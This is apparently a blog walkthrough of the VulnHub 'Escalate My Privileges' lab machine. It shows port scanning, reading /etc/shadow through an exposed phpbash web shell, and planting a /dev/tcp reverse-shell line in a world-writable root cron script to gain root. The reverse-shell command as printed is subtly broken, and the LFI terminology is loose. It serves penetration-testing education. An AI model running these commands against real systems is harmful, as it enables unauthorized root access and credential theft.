Escalate My Privilege Walkthrough

Introduction

Today we're doing a boot2root pentest walkthrough of the Escalate My Privilege machine, created by Akansha Sachin Verma and hosted at https://www.vulnhub.com/entry/escalate-my-privileges-1,448/ .

For this pentest, I will be using two virtual machines. A Kali Linux machine as the attacking system, and the Escalate My Privileges machine as the target system.

Locating The Target

This machine is configured so that the default login screen indicates the system's IP address on the network. Very nice!


Our target system is at 10.0.2.30.

Scanning and Enumeration

We start our scans with nmap to determine which TCP ports are open on the target.

nmap -T4 -p- 10.0.2.30


Five open ports. We'll plug these open ports into nmap again for a more detailed scan.

nmap -T4 -A -p22,80,111,2049,20048 10.0.2.30


 phpbash.php seems like a very likely target for a Local File Inclusion (LFI) vulnerability. We will definitely check it out in a bit. Next we'll run Nikto against the system's web server.

nikto -h 10.0.2.30


phpbash.php shows up again.  That page and phpinfo.php are ripe targets for LFI if it's present on the webserver.  We also find readme.txt.  Let's take a look at the system's webpage.

htttp://10.0.2.30


A picture of our goals. Very motivational! Let's check out the readme.txt page.

http://10.0.2.30/readme.txt


This is a serious hint. It tells us that there's a user on the system named armour, and that the user has some sort of backup-related files on the system, possibly in directory called /backup. We note this information, then move on to the phpbash.php page.

http://10.0.2.30/phpbash.php


This looks like a Linux command line. Just for fun, we try to cat out the /etc/shadow file.

cat /etc/shadow


That really shouldn't have worked. We can potentially run these two user's password hashes through a password cracking program like John the Ripper. For now, let's check the shadow file's permissions.

ls -l /etc/shadow


Most systems don't leave the shadow file world readable like this. Let's try looking for the backup directory the readme.txt page was hinting at.

locate backup



Finding a Way In

Quite a few files associated with the backup string.  This backup.sh bash script file in the armour user's home directory looks interesting, so we inspect it with the cat and ls commands.

cat /home/armour/backup.sh
ls -l /home/armour/backup.sh


The script just echoes the string "backup me", but according to the file permissions, the root user owns the script, but any user can write to the script.  On a hunch, we cat out the system's /etc/crontab file to see what files are being run on intervals as cron jobs.


cat /etc/crontab


Sure enough, the backup.sh file is being run every minute or so as a cron job.  Since any user can write to backup.sh, we can overwrite the contents of the file with echo to include a command that gives us a remote shell on our attacking system.  And because backup.sh is owned by root, when it's run as a cron job it's run with root privileges, so the remote shell created on our attacking system will be a root shell.

Before we can go through with this plan, we will need to setup a netcat listener on our attacking system.

nc -nlvp 4242


Privilege Escalation

Now we go back to the phpbash.php page, overwrite the backup.sh file contents with echo, then wait for the cron job to execute the script.

echo "bash -e >& /dev/tcp/10.0.2.4/42424 > /home/armour/backup.sh

Then we check our netcat listener after a minute or so.


So now we have our root shell, let's confirm that we're root, then take a look at what's in the /root/ directory.

whoami
cd /root/
ls


The last thing to do before finishing with this system is to access the flag file.

cat proof.txt


Summary

After initial scans, we found that the system was vulnerable to Local File Inclusion due to the presence of a php page that sent commands directly to the target system as a low-level user. Using this php page to enumerate the target system, we found a root-owned bash script that was both world writable and run as a cron job. We exploited this script to create a root shell on our attacking system and used the shell to access the system's flag file.

Finish


























Comments

Post a Comment

Popular posts from this blog

TryHackMe - Windows PrivEsc - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Windows PrivEsc room hosted at https://tryhackme.com/room/w indows10privesc . For this walkthrough, we'll be using two virtual machines (VMs), a Kali Linux VM as our attacking machine, and the deployed Windows 10 client as the the victim machine. Task 1 - Deploy the Vulnerable Windows VM Press the green button here: The Windows machine should come online after a minute or two. The IP address of the machine can be found here: Of course, the actual IP address will probably be a different one from the one in the screenshot.  For the examples, however, we will use the IP address of 10.10.227.113 RDP should be available on port 3389 (it may take a few minutes for the service to start). You can login to the "user" account using the password "password321": xfreerdp /u:user /p:password321 /cert:ignore /v:10.10.227.113 Questions: Deploy the Windows VM and login using the "user" ...
Read more

TryHackMe - Reversing Elf - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the Reversing ELF room hosted at https://tryhackme.com/room/ reverselfiles . For this walkthrough, we'll be using one virtual machine (VMs), a Kali Linux VM as our attacking machine. Task 1 - Crackme1 Questions What is the flag? Download the Task 1 Task File Copy it to your working directory Give the file executable permissions Run the file chmod +x crackme1 ./crackme1 Task 2 - Crackme2 Questions What is the super secret password ? Give the file executable permissions Run Ltrace on the file with a test string chmod +x crackme2 ltrace ./crackme2 test ./crackme2 passwordFoundInPreviousStep Task 3 - Crackme3 Questions What is the flag? Give the file executable permissions Run strings on the file Echo the base64 string you found, pipe it into Base64 decode chmod +x crackme3 strings crackme3 echo “ base64stringFoundInPreviousStep ” | base64 -d Task 4 - Crackme4 Questions What is the password ? Give the file execu...
Read more

TryHackMe - XSS - Walkthrough

Image
Introduction Today we're going to be doing a walkthrough for the XSS room hosted at https://tryhackme.com/room/ xss . For this walkthrough, we'll be using two virtual machines (VMs), the TryHackMe AttackBox VM as our attacking machine, and the deployed XSS vulnerable web client as the the victim machine. Task 1 - Introduction Questions: Read the introduction. No answer needed Task 2 - Deploy your XSS Playground Questions Deploy the machine and navigate to http://<ip> No answer needed Task 3 - Stored XSS Questions The machine you deployed earlier will guide you though exploiting some cool vulnerabilities, stored XSS has to offer. There are hints for answering these questions on the machine. No answer needed Add a comment and see if you can insert some of your own HTML. Doing so will reveal the answer to this question. Register for the web-app with the following parameters Username: test Password: test Click the Register button  Click the “hamburger menu” button Click the ...
Read more